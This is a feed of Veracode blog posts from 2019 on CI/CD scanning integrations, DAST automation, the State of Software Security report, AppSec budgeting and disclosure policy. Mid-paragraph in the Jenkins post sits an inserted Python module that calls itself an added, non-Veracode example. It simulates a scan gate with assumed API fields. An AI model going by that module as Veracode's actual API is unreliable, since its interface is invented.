</code></pre><p>In this example, we have defined:</p> <p>Name — YAML workflow name defined in this script</p> <p>Command — command to run the Veracode API. Details on downloading the API jar are provided in the previous step</p> <p>-vid $VERACODE_API_ID — user’s Veracode ID access credential</p> <p>-vkey $VERACODE_API_KEY — user’s Veracode Key access credential</p> <p>-action uploadandscan — name of the Veracode API invoked by this script</p> <p>-appname $VERACODE_APP_NAME — name of the customer application targeted for uploading and scanning by the Platform. This application name should be defined identically to the way that it is defined in the application profile on the Veracode Platform</p> <p>-createprofile false — a Boolean that defines whether an application profile should be created automatically if no existing application profile matches the veracode_app_name.</p> <ul> <li>If defined as true, an application profile will be created automatically if no app_name match is found, and the upload and scan steps will continue</li> <li>If defined as false, no application profile will be created, and no further upload and scan actions are taken</li> </ul> <p>-version CircleCI-$CIRCLE_BUILD_NUM — version label for the scan, derived from the Circle CI build number that the customer is using to run this integration</p> <p>-filepath — 
location where the application file resides prior to interacting with the Veracode API</p> <p>With these four steps, Veracode scanning is now integrated into a new CI/CD pipeline.</p> <p>Integrating application security scanning directly into your build tools enables developers to incorporate security scans directly into their SDLC cycles. Finding software vulnerabilities earlier in the development cycle allows for simpler remediation and more efficient issue resolution, enabling Veracode customers to build more secure software, without compromising on development deadlines.</p> <p>For additional information on Veracode Integrations, please visit our <a href="//">integrations page</a>.</p> Thu, 14 Nov 2019 09:59:48 -0500 (krise) ver44361 State of Software Security v10: Top 5 Takeaways for Security Professionals <img src="/sites/default/files/styles/resize_960/public/shutterstock_213363751-min.png?itok=KBrIaA6R" width="960" height="480" typeof="foaf:Image" /><p>It’s the 10<sup>th</sup> anniversary of our <a href="//"><em>State of Software Security</em> (SOSS) report</a>! This year, like every year, we dug into our data from a recent 12-month period (this year we analyzed 85,000 applications, 1.4 million scans, and nearly 10 million security findings), but we also took a look back at 10 years of software security. With a decade’s worth of analysis about software vulnerabilities and the best ways to address them, we’re in a unique position to offer insights into creating secure code. There’s a lot to unpack in our most recent SOSS, including some then vs. now comparisons, a look at the most popular vulnerabilities, and a deep dive into security debt. Here are the five takeaways we consider most noteworthy for security professionals:</p> <h4><strong>Apps are insecure</strong></h4> <p>Eighty-three percent of applications have at least one flaw in their initial scan. And we’ve been hovering around that number for the past decade. 
In addition, the types of flaws that were plaguing code a decade ago are still wreaking havoc today. The top two flaw types seen in code 10 years ago are the same top two we saw this past year: information leakage and cryptographic issues. And many of the top 10 flaws in Volume 1 remain on the top 10 list today, including CRLF injection, Cross-Site Scripting, SQL Injection, and Credentials Management.</p> <p>What is going on here? We’ve said it before, and we’ll say it again: we need to do a better job helping developers create secure code. We recently partnered with to conduct a survey surrounding <a href="">DevSecOps skills</a> and found that less than one in four developers or other IT pros were required to take a single college course on security. Meantime, once developers get on the job, employers aren't advancing their security training options, either. Approximately 68 percent of developers and IT pros say their organizations don't provide them adequate training in application security.</p> <h4><strong>Security debt is a significant problem</strong></h4> <p>In the good news department, we do see improvement in fix rates. For example, half of applications showed a net reduction in flaws over the sample time frame. Another 20 percent either had no flaws or showed no change. This means 70 percent of development teams are keeping pace or pulling ahead in the flaw-busting race! However, we also found that teams are prioritizing newly found security flaws over older flaws, leading to security debt piling up. This year’s data reveals that flaws are much more likely to be fixed soon after they’re discovered.</p> <h4><strong>We’re doing a better job tackling high-severity flaws, but not the most exploitable ones</strong></h4> <p>As we said above, developers are doing a better job fixing what they find, and they are prioritizing both the most recently discovered, and the most severe. On the one hand, this is good news. 
On the other, we found the security debt that has accumulated across organizations is comprised primarily of Cross-Site Scripting, with Injection, Authentication, and Misconfiguration flaws making up sizable portions as well. This is noteworthy because Injection is the second most prevalent flaw category in reported exploits. Bottom line: Exploitability of a flaw needs to be prioritized, and older flaws need to be addressed. An older injection flaw is just as dangerous as a newly discovered one.</p> <h4><strong>When you scan more, you secure more</strong></h4> <p>This year’s report also looked at the effect of both scanning cadence and frequency on security debt and fix rate. And the results were striking. Those that scanned the most, and the most regularly, had dramatically better fix rates and less security debt. In fact, those with the highest scan frequency (260+ scans per year) had 5x less security debt, and a 72 percent reduction in median time to remediation.</p> <h4><strong>There are some differences in how organizations in different industries are securing software</strong></h4> <p>Looking at the software security trends in your own industry gives you an idea of how your program compares, and where to focus your security efforts.</p> <p>And we did find some significant differences this year in how different industries are tackling AppSec. For instance, we found that organizations in the retail sector are doing the best job at keeping security debt at bay, while those in the government and education space are doing the worst.</p> <p>The infrastructure industry is fixing flaws almost 4X faster than any other industry, and 13X faster than the median time to remediation for healthcare. 
The financial industry has an impressive fix rate, but one of the slowest median times to remediation.</p> <p>You’ll find all the SOSS X industry infosheets, which include details on which vulnerabilities are most common in each industry, on our <a href="//">Resources</a> page.</p> <h4><strong>Read the report</strong></h4> <p>Read the full SOSS report to learn more about best practices that can help keep your software secure. Check out our <a href="//">SOSS X page</a> for access to the full report, additional data highlights, videos of Veracode experts discussing the results, and more.</p> Tue, 12 Nov 2019 12:35:01 -0500 (sciccone) ver44271 Automate Dynamic Analysis Scans With New REST APIs <img src="/sites/default/files/styles/resize_960/public/integrating_DAST_withRESTAPI-min%20%281%29.png?itok=w1T20CPu" width="960" height="480" typeof="foaf:Image" /><p>In today’s fast-paced, technology-driven world, security breaches have become an increasingly important priority for organizations; however, ensuring that your organization remains as secure as possible can be like trying to hit a moving target. One of the most common attack vectors that results in a breach is insecure web applications. Dynamic Application Security Testing (DAST) is one of the best ways to identify and remediate exploitable vulnerabilities in your web applications and reduce your risk of a breach.</p> <p>With a shift towards DevOps and more rapid releases, the easiest way to accomplish DAST scanning is through automation. This allows developers and security teams to automatically kick off DAST scans directly from the tools they already use. The Veracode Dynamic Analysis REST APIs enable our customers to automate the core functionality of the solution within their chosen development and security processes. 
Specifically, the REST APIs enable development teams to build their own integrations to create, configure, schedule, run, and link their results back to the application profile, which can aggregate their scan results across multiple assessment types. This means that development teams can kick off and return DAST scan results without ever needing to leave their unique workflows and development environments. The REST APIs coupled with faster scan times even allow customers to integrate DAST scanning as a non-release-blocking post-build action as a part of their CI/CD.</p> <p>Veracode’s <a href="">YAML</a> and <a href="">Swagger</a> files leverage these APIs to make it easy to integrate Veracode Dynamic Analysis into your SDLC, ensuring that they can be broadly leveraged regardless of the development tool. For further information on the Veracode APIs, visit the <a href="">Veracode Help Center</a>.</p> <h4>How to automate dynamic application scanning</h4> <p>DAST scans take longer to return scan results than static analysis testing because they need to crawl and attack the live application the way an attacker would without bringing down the application. Due to this crawl-and-audit scanning process, DAST solutions can seem less DevOps friendly than other assessment types. This can result in push back from development teams when they are asked to include DAST scanning every time the pipeline runs.</p> <p>The Veracode Dynamic Analysis REST APIs help address some of this push back. 
Now, instead of needing to take a separate step to initiate a DAST scan, development teams can integrate Veracode Dynamic Analysis into their SDLC or parallel security process and automatically kick off scans.</p> <p>There are several approaches you can take to automate DAST scanning with the Veracode Dynamic Analysis APIs:</p> <p><strong>100% API Driven</strong>: This is a very flexible approach made for teams that have a high level of comfort with writing custom scripts and using APIs for automation. This approach allows customers to use Swagger documentation, JSON templates, and possibly sequential API calls to drive intended code, configuration, and scan reuse behavior.</p> <p><strong>UI Configured, API Scheduled</strong>: This hybrid model allows customers to configure their scans within the Veracode Dynamic Analysis UI and then leverage that configuration when setting up automation through the APIs. This enables customers to validate their configuration with prescan prior to integrating with the APIs and allows for more trial and error.</p> <p><span>Below is an example of a recurring scan that starts every Friday, and the schedule expires after two instances.</span></p> <p> <div class="media media-element-container media-default"> <div id="file-24376" class="file file-image"> <div class="content"> <img style="" alt="" title="" class="media-element file-media-responsive" src="//" height="610" width="1048"> </div> </div> </div></p> <p>Below is an example of a scan with Pause and Resume for a blackout period between 9 and 11 p.m.</p> <p> <div class="media media-element-container media-default"> <div id="file-24381" class="file file-image"> <div class="content"> <img style="" alt="" title="" class="media-element file-media-responsive" src="//" height="651" width="965"> </div> </div> </div></p> <p>Below is an example of how to set up Auto Login for authenticated scans.</p> <p> <div class="media media-element-container media-default"> <div id="file-24386" class="file file-image"> <div class="content"> <img style="" alt="" title="" class="media-element file-media-responsive" src="//" height="857" width="1220"> </div> </div> </div></p> <h4><strong>Scan applications on private networks with Internal Scanning Management (ISM)</strong></h4> <p><span>It’s best practice to carry out dynamic analysis scans before an application is released to production and then regularly when it’s in production to ensure that there are no new exploitable vulnerabilities in the application. The first round of scanning therefore must take place either during the test or QA phases of deployment, but often these environments are not reachable from the Internet as they are behind the firewall. The only way to automate DAST scanning in the CI/CD is to conduct a behind-the-firewall scan. Additionally, some applications, such as those that are used for financial operations and HR purposes or applications that contain sensitive, highly regulated data, always live behind a firewall as an added layer of security. Unfortunately, if the firewall is compromised, these applications can still be at risk of a breach if not regularly scanned.</span></p> <p>Veracode Dynamic Analysis leverages Internal Scanning Management (ISM) to access applications behind the firewall. ISM establishes a secure connection to Veracode’s cloud and the network segment that hosts the target application. Unlike on-premise scanning appliances that typically have a one-to-one relationship between appliance and application, Veracode Internal Scanning Management allows organizations to scan multiple internal applications through a single endpoint. Additionally, this model does not require operational maintenance because all scan engine updates are carried out within the Veracode Platform. The Veracode Dynamic Analysis REST APIs allow customers to automate internal scanning. 
Once a customer has set up ISM within the Veracode Dynamic Analysis UI, APIs can leverage the gateway and endpoint IDs to automatically kick off DAST scans on applications that live behind the firewall.</p> <h4><strong>Why DAST: find exploitable vulnerabilities other assessment types overlook</strong></h4> <p>When you go to your doctor for an annual checkup, she conducts several tests on you. Taking your temperature won’t surface issues with your liver, and a blood test won’t find a broken bone. Similarly, a comprehensive application security program needs several assessment types for due diligence of high-risk applications.</p> <p>Dynamic analysis instruments a browser to actively attack the running application. As such, the vulnerabilities it finds are provably exploitable and not merely theoretical based on analyzing the source code, which reduces false positives. Dynamic analysis is also the only assessment type that can find security misconfigurations on the server because it assesses the running instance rather than the code. In a nutshell, one assessment type only gives you a partial understanding of your application risk; the only way to ensure that you have broad security coverage of your applications is to scan with multiple assessment types across your software development lifecycle.</p> <p>Regardless of which combination of scanning technologies your team leverages, automating scanning ensures broader adoption of security testing among development and security teams. Veracode Dynamic Analysis’ REST APIs provide added flexibility for organizations to include DAST scanning in development and existing security processes by reducing the time teams must spend uploading, configuring, scheduling, and kicking off scans, ultimately helping our customers reduce their overall risk of a breach. 
For more information, please visit the <a href="">Veracode Help Center</a> or the <a href="">Veracode Community</a>.</p> Thu, 31 Oct 2019 12:21:04 -0400 (bsarathy) ver44211 Veracode Dynamic Analysis + Jenkins: Integrate DAST Into Your CI/CD Pipeline <img src="/sites/default/files/styles/resize_960/public/DAST_Jenkins_integration-min.png?itok=Rxucn3Ie" width="960" height="480" typeof="foaf:Image" /><p>It’s the age-old dilemma – balancing the need to ensure applications are secure with the need to release applications and updates on faster and faster schedules. With many teams adopting the principles of DevSecOps, and implementing security checks as early as possible in the SDLC, a key aspect of success is integrating security with the tools that development teams already use.</p> <p>The Veracode Dynamic Analysis + Jenkins integration allows you to automate DAST scanning by creating post-build resubmit and review actions through the freestyle build or resubmit and review steps as part of the pipeline build.</p> <h4><strong>Why integrate DAST scanning into your CI/CD?</strong></h4> <p>To get the most comprehensive understanding of your risk, it’s best practice to implement multiple assessment types throughout the SDLC. In this way, you not only identify flaws in code, but also find exploitable vulnerabilities that have made it into production that could leave your organization open to a breach. One way to get a complete view into these exploitable vulnerabilities is to perform regular Dynamic Application Security Testing (DAST) scans on your web applications.
DAST scanning can take place as early as test or QA but often is performed on runtime web applications to monitor the application for vulnerabilities that may not have been caught by earlier forms of testing.</p> <p>In the past, DAST scanning was viewed as a slower assessment type and incompatible with more rapid development processes like CI/CD; however, thanks to a newly released integration between Veracode Dynamic Analysis and Jenkins, development teams can perform these critical checks as a part of their regular release cadence. This integration will leverage the tools and processes that development teams are already using and will make ensuring developer adoption a much easier task for the security team.</p> <h4><strong>Creating post-build actions with freestyle or pipeline builds</strong></h4> <p>Veracode knows that development teams use Jenkins differently, and that is why we have built in flexibility in how this integration can be used. With the freestyle builds, you can leverage Global Veracode API account credentials to set up resubmit and review actions.</p> <p><strong><em>Resubmitting Veracode Dynamic Analysis scans in Jenkins</em></strong></p> <p>Resubmitting your DAST scan will ensure that you are able to see the most up-to-date vulnerability data for your web application. With rapidly changing applications and an ever-evolving threat landscape, an application that was secure during one release pipeline may no longer be secure for the next. The ability to resubmit scans ensures that your teams are checking for exploitable vulnerabilities and remediating the ones that are found right from their Jenkins instance. 
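The automation pattern behind both the ISM REST-API post above and this Jenkins integration is the same: submit a scan against an internal target through a gateway/endpoint pair, wait for it with a bound on scan duration (the resubmit action), wait for results with a bound on review time (the review action), and fail the build when results violate policy. The following Python module is an added example written for this page, not Veracode's code or its API; the `DastClient` interface, the `gateway_id`/`endpoint_id` request fields, the severity scale and the findings format are assumptions that stand in for the vendor's REST API, and `FakeDastClient` simulates a scan behind the firewall so the gate runs offline.

```python
"""Pipeline gate for an internal DAST scan: submit, wait, review, fail the build.

Added example; not Veracode's code.  The client interface and request fields
below are assumptions standing in for the vendor's REST API.
"""
from dataclasses import dataclass, field
from enum import Enum


class Outcome(Enum):
    PASSED = "passed"
    SCAN_TIMEOUT = "scan exceeded maximum duration"      # resubmit action
    RESULTS_TIMEOUT = "results not available in time"    # review action
    POLICY_FAILED = "results violate policy"             # review action


@dataclass
class ScanRequest:
    analysis_name: str
    target_url: str
    gateway_id: str          # assumed field: ISM gateway linking cloud and internal segment
    endpoint_id: str         # assumed field: endpoint inside the private network
    max_scan_minutes: int    # bound enforced by the resubmit action


@dataclass
class Finding:
    severity: int            # assumed scale: 5 = very high ... 1 = very low
    cwe: int
    url: str


@dataclass
class Policy:
    max_severity_allowed: int = 3   # fail on high (4) and very high (5)


class FakeDastClient:
    """Offline stand-in for the scanning service.  Simulated time advances one
    minute per tick(); the scan finishes after `scan_minutes` and findings are
    published `publish_delay` minutes later."""

    def __init__(self, scan_minutes, findings, publish_delay=0):
        self.scan_minutes, self.findings, self.publish_delay = scan_minutes, findings, publish_delay
        self.elapsed = 0
        self.submitted = None

    def submit(self, req: ScanRequest) -> str:
        # A target on a private network cannot be reached without the ISM pair.
        if not (req.gateway_id and req.endpoint_id):
            raise ValueError("internal target requires gateway_id and endpoint_id")
        self.submitted = req
        return "scan-0001"   # constructed identifier

    def tick(self):
        self.elapsed += 1

    def status(self, scan_id) -> str:
        return "finished" if self.elapsed >= self.scan_minutes else "running"

    def results(self, scan_id):
        ready = self.elapsed >= self.scan_minutes + self.publish_delay
        return list(self.findings) if ready else None


def violations(policy: Policy, findings):
    return [f for f in findings if f.severity > policy.max_severity_allowed]


def gate_build(client, req: ScanRequest, policy: Policy, results_wait_minutes: int):
    """Returns (Outcome, list of policy-violating findings)."""
    scan_id = client.submit(req)
    # Resubmit action: wait for the scan itself, bounded by max_scan_minutes.
    for _ in range(req.max_scan_minutes + 1):
        if client.status(scan_id) == "finished":
            break
        client.tick()
    else:
        return Outcome.SCAN_TIMEOUT, []
    # Review action: wait for published results, bounded by results_wait_minutes.
    for _ in range(results_wait_minutes + 1):
        findings = client.results(scan_id)
        if findings is not None:
            break
        client.tick()
    else:
        return Outcome.RESULTS_TIMEOUT, []
    bad = violations(policy, findings)
    return (Outcome.POLICY_FAILED if bad else Outcome.PASSED), bad


# Constructed request for an internal QA host (placeholder identifiers).
QA_REQUEST = ScanRequest("qa-storefront", "http://qa-store.internal.example",
                         "gw-PLACEHOLDER", "ep-PLACEHOLDER", max_scan_minutes=10)

if __name__ == "__main__":
    client = FakeDastClient(scan_minutes=5, findings=[Finding(5, 89, "/search")])
    outcome, bad = gate_build(client, QA_REQUEST, Policy(), results_wait_minutes=5)
    print(outcome.value, [(f.cwe, f.url) for f in bad])
```

The two loops mirror the two fail-fast bounds the integration exposes; keeping them separate lets a team tune the scan budget and the review budget independently, and the policy check runs only once real results exist, so a timeout is never silently reported as a pass.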
You can configure each resubmit action for specific analyses as well as for scan duration, which will help your teams fit DAST scanning into their release pipelines.</p> <p><strong><em>Reviewing Veracode Dynamic Analysis results in Jenkins</em></strong></p> <p>Once your teams have run Veracode Dynamic Analysis, it is easier for them to review their results from within Jenkins instead of in the Veracode Application Security Platform. This integration allows you to review the DAST results of any linked application right in Jenkins and see whether your application meets or fails policy.</p> <p><strong><em>Failing the Build</em></strong></p> <p>It is important to note that development teams can automatically fail the build and stop the application from releasing if the application does not meet security policy. With the Veracode Dynamic Analysis + Jenkins integration, development teams can fail the build if:</p> <ul> <li>A scan takes too long as part of the resubmit action</li> <li>Results don’t return within a certain timeframe as part of the review action</li> <li>The results fail policy as part of the review action</li> </ul> <p>This ensures that your teams are unable to release insecure applications prior to a full security audit and will greatly reduce your risk of a breach.</p> <p>Ultimately, integrating Veracode Dynamic Analysis into your CI/CD pipeline will help to make your web applications more secure. To learn more about setting up this integration, please <a href="">visit the Veracode Help Center</a> or reach out to Veracode Support.</p> Wed, 30 Oct 2019 12:45:04 -0400 (mkvitnitsky) ver44216 Announcing the 10th Volume of our State of Software Security Report <img src="/sites/default/files/styles/resize_960/public/SOSS10-Blog-Header-min.png?itok=osnFJBWZ" width="960" height="378" typeof="foaf:Image" /><p>Today marks a big milestone for Veracode, and for the application security industry –
we’re releasing the 10<sup>th</sup> volume of our <em>State of Software Security</em> (SOSS) report. 10 SOSS reports and 80,000+ apps later, we’ve accumulated a lot of data, and a lot of insights, about application security trends and best practices. This year, we took a look back at the AppSec picture over the past 10 years, and dug into the data amassed from our security scans from April 2018 to March 2019. Some big takeaways:</p> <p><strong>The more things change, the more they stay the same: </strong>We’ve seen some positive movement this year, but we’ve got a long way to go. The same vulnerabilities are populating the top 10 list, and the percentage of applications that have at least one vulnerability on initial scan has remained high and stagnant over the past 10 years. Secure coding training is clearly still a critical component of any security program.</p> <p><strong>We’ve moved beyond just finding flaws to fixing them:</strong> Our VP of Services Pejman Pourmousa was recently quoted saying, “you can’t scan your way to secure code.” And that sentiment appears to be gaining momentum. This year’s data, especially compared to data over the past 10 years, reveals that developers are indeed focused on fixing the security flaws they find more than ever before. For example, half of applications showed a net reduction in flaws over the sample time frame. Another 20% either had no flaws or showed no change. This means 70% of development teams are keeping pace or pulling ahead in the flaw-busting race!</p> <p><strong>Security debt is piling up:</strong> Although fix rates are improving, most organizations are prioritizing newly found security flaws, while letting older, unaddressed flaws linger. This accumulation of security debt is both illustrated in our SOSS data and has started to emerge as a pain point in our conversations with customers.
But this year’s data also provides some compelling evidence surrounding steps organizations can take to start chipping away at that debt. In particular, organizations that are scanning the most are carrying 5x less security debt than those scanning the least.</p> <p>See below for the data highlights, and check out the <a href="//">full report</a> for all the data details, plus our advice on how to use the story told by the numbers to improve your own application security program.</p> <p>&nbsp;</p> <div style="text-align:center;"><img alt="SoSS Infographic" src="//" title="SoSS Infographic"></div> Tue, 22 Oct 2019 08:37:34 -0400 (sciccone) ver44041 Beyond Testing: The Human Element of Application Security <img src="/sites/default/files/styles/resize_960/public/human_element_AppSec.png?itok=JRCQxNXZ" width="960" height="480" typeof="foaf:Image" /><p>Companies of every size and in every industry are changing the world with software. From healthcare to agriculture, education, and manufacturing, software is enabling unprecedented advancement and innovation. But if that software is insecure, these innovations may get held up, or worse, put us at risk. And this is a very real concern; our most recent <em><a href="//">State of Software Security report</a></em> found that 83 percent of applications had at least one vulnerability on initial scan. In turn, testing the security of software and addressing any security-related defects is a critical undertaking.</p> <p>However, it’s important not to lose sight of the fact that effective application security secures software throughout its entire lifecycle – from inception to production. With the&nbsp;speed of today’s development cycles – and the speed with which software changes and the threat landscape evolves –
it would be foolish to assume that code will always be 100 percent vulnerability-free after the development phase, or that code in production doesn’t need to be tested or, in some cases, patched.</p> <p>An effective application security program requires some “human” elements beyond testing, including:</p> <p><strong>Developer secure coding training</strong>, because the vulnerability that is never introduced will always be the cheapest and easiest to fix. Most developers don’t receive training on secure coding, either in school or on the job, but when they do, it pays off. Data collected for our <em>State of Software Security</em> report found that eLearning on secure coding&nbsp;improved developer fix rates by 19 percent.</p> <p><strong>A solid vulnerability disclosure policy</strong>, which ensures that vulnerabilities unearthed by security researchers are addressed and disclosed in an effective manner. Veracode’s co-founder and CTO Chris Wysopal notes that, “Today, we have both tools and processes to find and reduce bugs in software during the development process. But even with these tools, new vulnerabilities are found every day. A strong disclosure policy is a necessary part of an organization’s security strategy and allows researchers to work with an organization to reduce its exposure. A good vulnerability disclosure policy will have established procedures to work with outside security researchers, set expectations on fix timelines and outcomes, and test for defects and fix software before it is shipped.”</p> <p><strong>Bug bounty programs</strong>, which put the power of multiple security researchers behind your application security. Wysopal says of bug bounty programs, “bringing in outside hackers with their own attack tools will uncover new risks. This is one of the clear values of bug bounty programs.”</p> <p>Ultimately, effective application security focuses on both prevention and detection.
You wouldn’t let your kids play with matches just because you have a fire extinguisher. On the other hand, even if you teach your kids about fire safety and never let them play with matches, you wouldn’t toss out the fire extinguisher. Fire safety requires prevention and detection, as does application security.</p> <p>Testing your code for vulnerabilities early and often in the development process, and assessing the security of both third-party and open source code are all essential software security steps. But detecting and responding to vulnerabilities with human solutions plays a critical part as well. Developer training, a vulnerability disclosure policy, and a bug bounty partnership all play a role.</p> <p>Continue this conversation with us at our <a href="//">fall road show</a>; we’ve teamed up with Bugcrowd and Edgewise on a series of networking events -- coming to a city near you!</p> Tue, 15 Oct 2019 14:23:50 -0400 (sciccone) ver43976 Making the Case for AppSec? Break Down Your Budget <img src="/sites/default/files/styles/resize_960/public/breaking_down_AppSec_budget.png?itok=lBBG9Nx8" width="960" height="480" typeof="foaf:Image" /><p>The bottom line on corporate decision-making comes down to the bottom line. It’s critical to demonstrate value for any new or expanded initiative. Fall short, and your odds of success are greatly diminished.</p> <p>How do you build the financial case for more robust AppSec, when the focus is on the impact to the bottom line? The key is understanding how to effectively design and present a budget that makes sense to your stakeholders. A crucial element is to recognize that stakeholders need options and choices. By breaking down your budget into categories such as “must do,” “should do,” and “could do,” you’ll greatly increase the odds of securing the budget you need.
It’s a lot harder to say no to several different options than to one plan and one number.</p> <h4><strong>Breaking It Down</strong></h4> <p>You most likely have a range of priorities within your AppSec initiative that you’d like funding for – the must do, should do, and could do activities you and your team want to execute. If you break down your “ask” into these three categories, you give your stakeholders options regarding what they can approve. For example, you might offer the following budget options:</p> <p><strong>Must</strong>: We <strong><em>must</em></strong> comply with industry regulations regarding AppSec. Whether it’s PCI, HIPAA, or NY DFS cybersecurity regulations, non-compliance is not an option, and getting budget to address regulations shouldn’t take much convincing.</p> <p><strong>Should: </strong>We<strong><em> should</em></strong> assess code with <a href="//">static analysis</a>, eliminate all “high” or “very high” severity flaws, and <a href="//">train developers</a> on secure coding. Getting at the most-likely-to-be-exploited vulnerabilities and cutting down on the new vulnerabilities being introduced into your code is a good place to start.</p> <p><strong>Could: </strong>We<strong><em> could</em></strong> employ <a href="//">multiple testing techniques</a> beyond static analysis and eliminate the “medium” severity flaws as well. Ultimately, static analysis is a good starting point, but truly effective AppSec requires several testing types that find different vulnerabilities in different ways, including dynamic analysis, software composition analysis, and manual penetration testing.</p> <p>The right frameworks can help guide you through this budget breakdown. For instance, the <a href="//">Veracode Verified</a> program provides a best-practice AppSec roadmap you can use to show a clear path forward. It can also help you break down the must/should/could items.
The ability to show progress and defend your budget is essential to getting the backing you need from key executives. You also don’t want to stall at the “must” budget, but show a path toward the most effective and efficient AppSec program.</p> <h4><strong>Additional Budget Selling Points</strong></h4> <p>After breaking down your budget to give stakeholders options, you can create urgency around the spend by finding an event or series of events that demonstrate the seriousness of the issue. This includes data about code vulnerabilities, incidents, and breaches, and what direct and indirect costs grow out of these events. For example, British Airways was recently <a href="//">fined £185 million</a> for its data breach.&nbsp;&nbsp;</p> <p>In addition, <a href="">highlight efficiencies</a> gained by your program. For example, demonstrate how an integrated and automated program will free staff from cumbersome and time-consuming processes, or how teams will be able to better focus on innovation.</p> <p>Finally, a good foundation for any business case is industry stats or benchmarks. Consider adding these data points into your pitch. You can find some in our <a href="//"><em>State of Software Security</em></a> report or consider the <a href="">OpenSAMM</a> model.</p> <h4><strong>On the Money</strong></h4> <p>Ultimately, any presentation should deliver only the most relevant points in a digestible format. Busy executives want to know whether a project will have a positive impact and what that positive impact will be. In order to become an effective change agent, keep your proposal and budget request limited to half a dozen key points, and be sure to focus on the issues that matter to specific executives.</p> <p>Remember, a robust AppSec program is a multi-year endeavor, and keeping the funding stream flowing is critical. In order to do this, budget requests must be tied to <a href="//">metrics, KPIs, and other measures</a>.
You must demonstrate ongoing success and show results in real-world ways that truly matter to business leaders and your enterprise. With buy-in from key stakeholders, your odds of obtaining essential funding and support are high. And that, in the end, is a formula for a more secure enterprise.</p> <p>For more details on making the case for AppSec budget, see our new guide, <a href=""><em>Building a Business Case for Expanding Your AppSec Program</em></a>.</p> Thu, 10 Oct 2019 09:59:58 -0400 (sciccone) ver43861 Know Your Audience to Make the Case for AppSec <img src="/sites/default/files/styles/resize_960/public/Know_Audience_AppSec_Pitch-min.png?itok=2ZCs-9xY" width="960" height="480" typeof="foaf:Image" /><p>Selling senior-level executives on any new concept can often feel like a trek up a mountain with a 60-pound pack on your back. So, <a href="">how can you take your application security program to a new and better level with less effort?</a> You focus on what’s really important: getting the right message to the right audience in a language they speak and connect with. Because when people hear things in terms that matter to them – and there’s persuasive evidence on hand – they stop resisting and even embrace the change.</p> <p>But sending one message to the multiple leaders involved in a decision-making process is a mistake. Refining your message appropriately by focusing on the information relevant to each group will help you build credibility, more effectively communicate your vision, and more easily gain buy-in. It’s an approach that extends far beyond AppSec, but it has particular relevancy in this space.</p> <h4><strong>On Target</strong></h4> <p>Any successful salesperson understands that it’s easier to close a sale when you communicate selling points that really matter to your audience. The same holds true when you are “selling” AppSec internally.
Your success hinges on understanding your strategic arc over the course of months and years, establishing metrics and KPIs that demonstrate your progress, and connecting all of this to tangible benefits for the people who hold the purse strings and can greenlight your initiative, and whose support you need for the successful implementation and administration of your program.</p> <p>You can gain the support you need by building a basic <a href="">business case</a> for the key groups in your organization, and ensuring that each stakeholder receives the specific information they need in words, figures, and graphics they understand. Whether it’s showing them how your AppSec program cuts costs, scales up efficiencies, fuels your DevOps strategies, or improves the company’s overall trust with business partners and customers, hitting the target matters. It’s crucial to document actual problems and incidents, and then use company data to support your case.</p> <h4><strong>First Things First</strong></h4> <p>Here are six key ways to gain C-suite executive buy-in for AppSec:</p> <ul> <li><strong>Avoid acronyms and technical jargon.</strong> Nothing confuses and distracts business leaders more than the use of unnecessary technical terms.</li> <li><strong>Use visuals instead of text.</strong> Display risks and potential costs in graphics that clearly illustrate potential losses and damage. Rely on numbers, and especially actual dollar figures, to gain credibility. And be sure to refine your message appropriately for each executive. For example, telling your CFO that you’ve reduced SQL injection vulnerabilities by 30 percent most likely won’t resonate. Your CFO wants to know the actual business value of reducing breaches. The CISO wants to understand how AppSec ties into the overall information security program, and the CIO is concerned with the cost of delivery/service and the cost of downtime.
Know your audience’s priorities, and speak their language.</li> <li><strong>Forget “features” and emphasize “risks.”</strong> Avoid a discussion about specific security products and what they can do – you run the risk of being seen simply as a technologist rather than a strategic partner. Instead, build a case around potential brand damage with industry metrics, benchmarks, and potential costs. Nearly two-thirds of company directors who responded to a Veracode and NYSE Governance Services <a href="">survey</a> said they prefer high-level strategy descriptions and risk metrics over information about security technologies.</li> <li><strong>Identify your organization’s pain points.</strong> Find a compelling event, such as a recent high-profile security breach, a prospect asking for a security audit, or even a lost sale due to security issues. Present actual data from past incidents to demonstrate how your organization will benefit from AppSec.</li> <li><strong>Pinpoint pet projects.</strong> Find something key stakeholders have a burning interest in, and make that your focus. For instance, if your organization’s customers are expressing concerns about privacy and security to your customer service reps, and one of your stakeholders is taking the lead on that issue, attach your cause to that issue. Quantifying the extent of the problem and presenting it to your leaders in a way that clearly illustrates how effective your solutions could be will likely sway decision-makers in your favor.</li> <li><strong>Focus on dollars.</strong> The same survey noted above found that among the 200 directors of public companies across a wide swath of industries who responded, 41 percent cited the cost of brand damage – including cleanup, lawsuits, forensics, and credit reporting costs –
as a top concern.</li> </ul> <p>Ultimately, anyone selling an AppSec program to their organization’s top decision-makers should take the time to identify risk benchmarks as compared to their industry peers – and what these mean in both practical terms and actual dollars. A focus on real-world issues and results, tied to what matters for specific stakeholders, can significantly boost your odds of success.</p> <p>For more information about how to promote AppSec, check out our new guide, <a href=""><em>Building a Business Case for Expanding Your AppSec Program</em></a>.&nbsp;</p> Thu, 26 Sep 2019 14:34:43 -0400 (sciccone) ver43726 Security and Development Agree, Coordinated Disclosures Are a Public Service <img src="/sites/default/files/styles/resize_960/public/coordinating_vulnerability_disclosure-min.png?itok=vyUJhO2-" width="960" height="480" typeof="foaf:Image" /><p><a href="//">Shifting security left</a> so that security testing becomes an integrated part of the development process helps companies improve software security. With software running our world, it is important to empower developers with the tools and processes they need to make security a part of their overall development process. Yet, even with a robust AppSec program that makes security a part of the development process, new vulnerabilities are found all the time. Companies need ways to find vulnerabilities once software is released. That’s where coordinated disclosure policies come into play.</p> <p>Coordinated disclosure policies allow security researchers to work with an organization to help them improve the security of their software. The conversation around vulnerability disclosure has become more nuanced over the past several years. What was once a topic that would spur intense debate is now one that invites discussion on strategy and best practices.
